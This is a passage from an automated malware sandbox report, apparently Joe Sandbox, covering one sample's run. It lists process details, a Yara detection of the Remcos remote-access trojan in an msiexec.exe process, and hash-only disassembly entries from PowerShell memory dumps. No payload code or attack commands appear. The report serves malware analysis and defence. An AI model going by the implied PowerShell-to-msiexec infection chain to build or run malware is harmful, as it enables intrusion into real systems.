                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:03:58:07
                        Start date:30/09/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0xe80000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:03:58:24
                        Start date:30/09/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x390000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 00007FFD9B68C6B6 Relevance: .5, Instructions: 472COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114152778.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b680000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1786d7f7af67f698b347cec65480809955aa876bdf7cb48bf361addf68ba45e0
                          • Instruction ID: b112b0e5ef15d8fbbcb1bca865c68aea6386318dd2f2d6fb6c570a4584e75670
                          • Opcode Fuzzy Hash: 1786d7f7af67f698b347cec65480809955aa876bdf7cb48bf361addf68ba45e0
                          • Instruction Fuzzy Hash: 2AF1C330A09A8D8FEBA8DF28D8557E937E1FF54300F04426EE85DC7295DB74A9408B82
                          Function 00007FFD9B68D462 Relevance: .5, Instructions: 458COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114152778.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b680000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be0fc97ee6969ded8e96d1137333ca27b4b5895c11a760d980c01eeafd949a6b
                          • Instruction ID: 1014cd8b04cc4080844b4c2d9d3d6082b34d58521214de82a31d91e7948e7e9b
                          • Opcode Fuzzy Hash: be0fc97ee6969ded8e96d1137333ca27b4b5895c11a760d980c01eeafd949a6b
                          • Instruction Fuzzy Hash: 07E1D230A09A4E8FEBA8DF28D8557E977E1EF54310F04426EE85DC7295DF74A9408B82
                          Function 00007FFD9B68FB65 Relevance: .8, Instructions: 758COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114152778.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b680000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e2d050dac5b5c751ded624bf55a4eb32010cd5b9d3aeaf278dccdce4dded25bd
                          • Instruction ID: bdc1fabca363ed4c90c3aa24aae6a7d51d637767594fb9344a92687919b7c59e
                          • Opcode Fuzzy Hash: e2d050dac5b5c751ded624bf55a4eb32010cd5b9d3aeaf278dccdce4dded25bd
                          • Instruction Fuzzy Hash: 3BF17230A1CA4D8FDF98EF5CC4A5AA97BE1FF68300F55016AE41DD7296CA34E941CB81
                          Function 00007FFD9B754539 Relevance: .5, Instructions: 538COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114962416.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7ff1a56b8bc533ab3424dcda614d4712582707932c11d33d13a0a5ccc0d79eed
                          • Instruction ID: 4f517f60f74ec701fbdbcc9ee11e7f7d156019461048255fe1f13544cec783ab
                          • Opcode Fuzzy Hash: 7ff1a56b8bc533ab3424dcda614d4712582707932c11d33d13a0a5ccc0d79eed
                          • Instruction Fuzzy Hash: 6BF1E562B0FBCA0FE7A597A848756B53BD1EF52310B0A02FED08DC71F7D95869068341
                          Function 00007FFD9B900001 Relevance: .5, Instructions: 501COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2118125355.00007FFD9B900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b900000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39e3271b43b97e09abdabc096e88cd339be103412f06cb65d45532baee82c330
                          • Instruction ID: f7e6e961ac704bcd55a64e357e2854f1df3460c71201f35da1b1db08bed55e71
                          • Opcode Fuzzy Hash: 39e3271b43b97e09abdabc096e88cd339be103412f06cb65d45532baee82c330
                          • Instruction Fuzzy Hash: ABF13662A1EB8E1FE7A69B6848755687BE2EF56610F0900FED0DCC71E3DE18AD05C341
                          Function 00007FFD9B68D076 Relevance: .3, Instructions: 331COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114152778.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b680000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d0cc1d480065bce0352f2939bfee73797c2d309197a0c761e30a947c188c085
                          • Instruction ID: 96acb08953e9c96a9a95116fee5f22ff720a3d411856be23dfecbccb76918f14
                          • Opcode Fuzzy Hash: 6d0cc1d480065bce0352f2939bfee73797c2d309197a0c761e30a947c188c085
                          • Instruction Fuzzy Hash: C9B1E430608A4D8FEB68DF28D8657E93BE1FF55310F04426EE85DC7291CA74A941CB82
                          Function 00007FFD9B7546C4 Relevance: .1, Instructions: 99COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114962416.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ed2309efd09ec6395e79bfc9ae312ce300a46d59390fecb90aeace65a9b91fc
                          • Instruction ID: 476982f61c32ba61a8e35d9dd46fb90165490358b9d613505af196d6e1d24d0a
                          • Opcode Fuzzy Hash: 5ed2309efd09ec6395e79bfc9ae312ce300a46d59390fecb90aeace65a9b91fc
                          • Instruction Fuzzy Hash: AB21F722F0FB8E0BE3B597A8086527572C6EF82350B4A05BED05DC71FBED59AD028241
                          Function 00007FFD9B68CB74 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114152778.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b680000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 628fc757b83d29594169578f001f798f25311ecb5a3be03c3c2105f945fe1c14
                          • Instruction ID: 934fef1ccad6ba6dc348f858c90202808de666a3353f57d404b707bda0e30c25
                          • Opcode Fuzzy Hash: 628fc757b83d29594169578f001f798f25311ecb5a3be03c3c2105f945fe1c14
                          • Instruction Fuzzy Hash: FA312030A19A4DCEFBB49F54CC65BF932A0FF45319F414539D41D8A0A2CA787A85CB11
                          Function 00007FFD9B7519AF Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114962416.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a995e2e883e62b9d54d13b42c628a61055bcb5c060b9d8e33daa65462d1346b1
                          • Instruction ID: 620970cbf738701db5e8a8a78bfb656f3f4e676cadca3ce1f7e7d89e1a4afe5d
                          • Opcode Fuzzy Hash: a995e2e883e62b9d54d13b42c628a61055bcb5c060b9d8e33daa65462d1346b1
                          • Instruction Fuzzy Hash: 0921F463F0F7C90FE7A196A808751643BD1AF56651B0A06BFD098CB1F3EC585D0A8351
                          Function 00007FFD9B7571F5 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114962416.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b9c3bf9575acbe0adb45d58f357c2d0a675130af3703027ec2ebd1e20a15dfe
                          • Instruction ID: b7c75cbe6b47d4117fa10c608d4c8753a251c5289f4ba0df35cbc03e24089917
                          • Opcode Fuzzy Hash: 8b9c3bf9575acbe0adb45d58f357c2d0a675130af3703027ec2ebd1e20a15dfe
                          • Instruction Fuzzy Hash: 13016822B0FB8D1FEB65DFE844605A87BE2EF58310F0402BFE08DC30A3D950A9018341
                          Function 00007FFD9B6841E5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114152778.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b680000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
                          • Instruction ID: 8d915122225b384a9807e998c5821c95f25a762d50185bc7ff5b37b32e3dd062
                          • Opcode Fuzzy Hash: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
                          • Instruction Fuzzy Hash: 4301A73120CB0C4FD748EF0CE051AB5B3E0FB95320F10056DE58AC36A5D632E882CB41
                          Function 00007FFD9B757224 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2114962416.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4332736c2863de0981b3c2f5979daac4601e7d5b50011219b1f7a470c07068a0
                          • Instruction ID: 5ebc5dc307e7d786ed8c38e5fa67cdbd8bd76c51eeb25037fd397d4e11acec76
                          • Opcode Fuzzy Hash: 4332736c2863de0981b3c2f5979daac4601e7d5b50011219b1f7a470c07068a0
                          • Instruction Fuzzy Hash: C2F0BE32A0FB8C4FEB65EBA854695E8BBA1EB59260F0400BFE08DD21A3E92558418351

                          Executed Functions

                          Function 07496B68 Relevance: 31.2, Strings: 24, Instructions: 1166COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                          • API String ID: 0-864139783
                          • Opcode ID: e354b0e8f08cca9943b6c838b0352122f98cd6e3ddcd89c3ed7bb8fafbed30fe
                          • Instruction ID: e2208ee48c441e276609d6b21d4e1299ab4dbe303be7cce3167577773afc3032
                          • Opcode Fuzzy Hash: e354b0e8f08cca9943b6c838b0352122f98cd6e3ddcd89c3ed7bb8fafbed30fe
                          • Instruction Fuzzy Hash: DB92A1B0B102199FCF258B68C855BEABFB6AF85314F1484BBD9059B781DB31DC41CB92
                          Function 07492CE8 Relevance: 9.1, Strings: 7, Instructions: 378COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
                          • API String ID: 0-332123906
                          • Opcode ID: d7a5b3f25c8db94b2de665ac652a6176d5272c86017e9e7c160a2c41086d6366
                          • Instruction ID: 6e048244547449363fa76796c34072c54e4ea52d983d8f43dd9c1014baf94f60
                          • Opcode Fuzzy Hash: d7a5b3f25c8db94b2de665ac652a6176d5272c86017e9e7c160a2c41086d6366
                          • Instruction Fuzzy Hash: F9D106B1605345AFCF258B68C8516A7BFB5BF86210F18C0ABE444CF296DB75CC46C7A2
                          Function 07495070 Relevance: 8.2, Strings: 6, Instructions: 706COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f l$(f l$(f l$(f l$(f l$(f l
                          • API String ID: 0-3556563423
                          • Opcode ID: f43f22d4ef63c7ca460163a2b23d33094564f11fda42c6fb0882fdf63629e669
                          • Instruction ID: 0530c51145a293d463f2faf8524528d8bafdd13b19c7e937b4a1bfdbea2d5b78
                          • Opcode Fuzzy Hash: f43f22d4ef63c7ca460163a2b23d33094564f11fda42c6fb0882fdf63629e669
                          • Instruction Fuzzy Hash: C65270B4B00204DFDB15CB98C545AAEFBB2AF85318F25C16AE9059F795CB72EC42CB41
                          Function 074962C8 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                          • API String ID: 0-1373546133
                          • Opcode ID: 0f45073d0dcc2f77801aac823ee3df9446d95d455a006fd38bb29178b39ea43f
                          • Instruction ID: 79bfdcc08de429bba2a04667861d27ddd96a1657f9326c096eb11907a2ba94bc
                          • Opcode Fuzzy Hash: 0f45073d0dcc2f77801aac823ee3df9446d95d455a006fd38bb29178b39ea43f
                          • Instruction Fuzzy Hash: 66D150B0B002099BCB14DBA8C455B9EBBB3AF84304F15D46AE9056F795CF75DC82CB92
                          Function 074971E3 Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f l$(f l$4'fq$4'fq
                          • API String ID: 0-811112533
                          • Opcode ID: c5a3ca3808dfcd74d7cadab3f4f32b3d200a166b6b4245279b7c9d6022bdd14a
                          • Instruction ID: b3ebf64df2d6a56d11034f16e4ee5a264eff0dc5d048411594d186724d22bdc3
                          • Opcode Fuzzy Hash: c5a3ca3808dfcd74d7cadab3f4f32b3d200a166b6b4245279b7c9d6022bdd14a
                          • Instruction Fuzzy Hash: 1CF183B0B502149FDB24DB68C955BAEBFB3AF85304F1080A6E9096F791CF75DC818B91
                          Function 074984C8 Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$$fq
                          • API String ID: 0-572745046
                          • Opcode ID: e80b5f9e6ebd5f8e838f12b683e21929153e46dcb795425afa540b1ba804a180
                          • Instruction ID: 1aaecf583eed9ab6f5980e4a6b0d5c71f95265a16dc79dd3eceb5dccb6b5206d
                          • Opcode Fuzzy Hash: e80b5f9e6ebd5f8e838f12b683e21929153e46dcb795425afa540b1ba804a180
                          • Instruction Fuzzy Hash: 74A101B1B042059FCF158B7C88516AB7FAAAB87210F1584BBD941CF792DE35CC85C7A2
                          Function 074962A8 Relevance: 4.0, Strings: 3, Instructions: 272COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$4'fq
                          • API String ID: 0-3646979650
                          • Opcode ID: 4fa36f8e965e60ec290c1b3e7a9a03dc5aa8010df3cf9ae7f9d3f622b61db0de
                          • Instruction ID: dc0f9eadc8725a07ce0402f125278de6c80e7b544dde6ab3033b928bfe886356
                          • Opcode Fuzzy Hash: 4fa36f8e965e60ec290c1b3e7a9a03dc5aa8010df3cf9ae7f9d3f622b61db0de
                          • Instruction Fuzzy Hash: 13B170B4A002059FCB14CB68C545B9EBFB2EF88314F16C46AE9056F355CB35EC86CB92
                          Function 07491020 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $fq$$fq$$fq
                          • API String ID: 0-837900676
                          • Opcode ID: 587611987488f6e9ed3663c0a7c61e492edbb70e8cdfc3b5aa1a99e76e5d9306
                          • Instruction ID: 10b3b9192770fc34d9b82639349be9c61c795ccff45d42320035852ad85e9ae2
                          • Opcode Fuzzy Hash: 587611987488f6e9ed3663c0a7c61e492edbb70e8cdfc3b5aa1a99e76e5d9306
                          • Instruction Fuzzy Hash: BF2146B171028BDBDF64556E8841BA7BE9A9BC1715F30843BA605C7B85DD37C8418321
                          Function 07495053 Relevance: 3.0, Strings: 2, Instructions: 528COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f l$(f l
                          • API String ID: 0-3040009154
                          • Opcode ID: 358ca4877050ca0ee7ba99f15bc15f07754f6d91c1e2f8e722723b8e66524afb
                          • Instruction ID: d18466958425bb0fbc724e58b24aa04e8284bf2c8b7523911fe2c5017594c83f
                          • Opcode Fuzzy Hash: 358ca4877050ca0ee7ba99f15bc15f07754f6d91c1e2f8e722723b8e66524afb
                          • Instruction Fuzzy Hash: BB224CB4B00205DFDB25CB58C545AAAFBB2FF85314F25C16AE9059B395CB72EC42CB41
                          Function 07494CC8 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f l$(f l
                          • API String ID: 0-3040009154
                          • Opcode ID: d123662f62803cc8accdea9a250d282b113347686b3e450da63891611b65284e
                          • Instruction ID: 01c1cf426cf072aa0c4b63d359de24a0b3d4d20e94c641ae5dfb9f31d730c647
                          • Opcode Fuzzy Hash: d123662f62803cc8accdea9a250d282b113347686b3e450da63891611b65284e
                          • Instruction Fuzzy Hash: 199172B4B40204AFDB14DBA8C545BAFBBE2AF89304F10806AE901BF755DF75EC418B95
                          Function 0749100E Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $fq$$fq
                          • API String ID: 0-2537786760
                          • Opcode ID: f9c296cd9929f9ac8d8201828045a6fdac86990ce018bfc173ece746c3d7742a
                          • Instruction ID: d17e6bb66d991b0362f6eba5106480c45f68ce31b3a1f1c7479a1a05267b839a
                          • Opcode Fuzzy Hash: f9c296cd9929f9ac8d8201828045a6fdac86990ce018bfc173ece746c3d7742a
                          • Instruction Fuzzy Hash: EB110AB13083CBDBEF61456A88417A37FA94B82754F348477E945CAAC6D52AD844C322
                          Function 07495751 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f l
                          • API String ID: 0-3642287758
                          • Opcode ID: 06552c39e8ba110f3039f7c8073fd796760357da3dfc2f94879c8b7db69f5fce
                          • Instruction ID: c9c6c15446a04e6823747a27308a4b439f730c223ed81ab3e80ca3b7b9445edb
                          • Opcode Fuzzy Hash: 06552c39e8ba110f3039f7c8073fd796760357da3dfc2f94879c8b7db69f5fce
                          • Instruction Fuzzy Hash: E9F16DB4B00205DFDB11CB58C445AAAFBB2EF95318F25C06AE9059F791CB72EC56CB81
                          Function 07494CA8 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f l
                          • API String ID: 0-3642287758
                          • Opcode ID: 68516089217ffebe0fc6db545b6027d01c23826c20ba7f4dc7459646fe88fac2
                          • Instruction ID: 2d9d60aaa58f3482a9e5536e0f93f9155ec8573a69ff705fa6f0fa433e5881c9
                          • Opcode Fuzzy Hash: 68516089217ffebe0fc6db545b6027d01c23826c20ba7f4dc7459646fe88fac2
                          • Instruction Fuzzy Hash: A89190B4B40205AFDB14DB68C445BDFBBF2AF89304F10806AE900BB791DB36AC45CB91
                          Function 074984AC Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq
                          • API String ID: 0-2007657732
                          • Opcode ID: d1458f00acfc6e36ff74723a8d85925da6ce9a411ee00fa5f30674d1cb03bd71
                          • Instruction ID: d4f13d27252dae34461bac035f98e6d0575abd7210888617784793e6541be3fd
                          • Opcode Fuzzy Hash: d1458f00acfc6e36ff74723a8d85925da6ce9a411ee00fa5f30674d1cb03bd71
                          • Instruction Fuzzy Hash: 6A41D2F0B00206AFCF148F2CC544AAB7FAAAF96254F1984BBD9018B391DB35DD45CB51
                          Function 074966EE Relevance: .1, Instructions: 102COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe99ca2c84cbf8dc0ca7ac0706c0ce5458b6713c2a7b328fa47749aec89857bf
                          • Instruction ID: 4a47cf5b5a1ba0497167f3ac1108eabeda6956de599111e1ba532e6fd4b15591
                          • Opcode Fuzzy Hash: fe99ca2c84cbf8dc0ca7ac0706c0ce5458b6713c2a7b328fa47749aec89857bf
                          • Instruction Fuzzy Hash: 643150B4B40214ABD70497A8C855BAFBBA3AF84304F109466ED056F791CF769C818BD2
                          Function 07490EE0 Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d8850f5404fbcfd54ac1ce13aa825dcce651e3e4b09a035c0b7ab9f52125146
                          • Instruction ID: 8873b0dc77cba517e0f5e2eb7c3b453ae974868f81fb86eb6efcc5d5da0aeeba
                          • Opcode Fuzzy Hash: 3d8850f5404fbcfd54ac1ce13aa825dcce651e3e4b09a035c0b7ab9f52125146
                          • Instruction Fuzzy Hash: 2A217EB17003079BCF64157E4881BB77E9A9BC5705F10843BA505C73D9EDB6C9418361
                          Function 07490EC4 Relevance: .1, Instructions: 83COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cfaecca90a3683c1a700a5e50339f7262b2e1c5aedfc052713398efe3180a7d4
                          • Instruction ID: a7abbc96ea13173a72c5a368de2097be0b7cbf93d9c91026502c181b3cdb91a8
                          • Opcode Fuzzy Hash: cfaecca90a3683c1a700a5e50339f7262b2e1c5aedfc052713398efe3180a7d4
                          • Instruction Fuzzy Hash: D42172B13043466BCF210B6944507A77FA69F81350F14842BD985C73DAE5B5DE44C361
                          Function 07490CD0 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2905070038b4f5a208400d0525c5044e5558588dfbc05347c4f7110d06f95947
                          • Instruction ID: ff3162c157e07a093de40e2a066041faa360007a7ca028609de82ec9ec4774e4
                          • Opcode Fuzzy Hash: 2905070038b4f5a208400d0525c5044e5558588dfbc05347c4f7110d06f95947
                          • Instruction Fuzzy Hash: C601477630021B9BCF2449AEE4006B7BF9ADFC1222F14C03BEA59C7360DA36D841C3A1
                          Function 07499E09 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4266e248998d65af916e61ad646bbfa96f67ddd1a14179325c36affe0e6e77b5
                          • Instruction ID: 75dcdf03b374823ef7eb5d110d902aebbcc319c4be3497c4d583f1faa0d1f981
                          • Opcode Fuzzy Hash: 4266e248998d65af916e61ad646bbfa96f67ddd1a14179325c36affe0e6e77b5
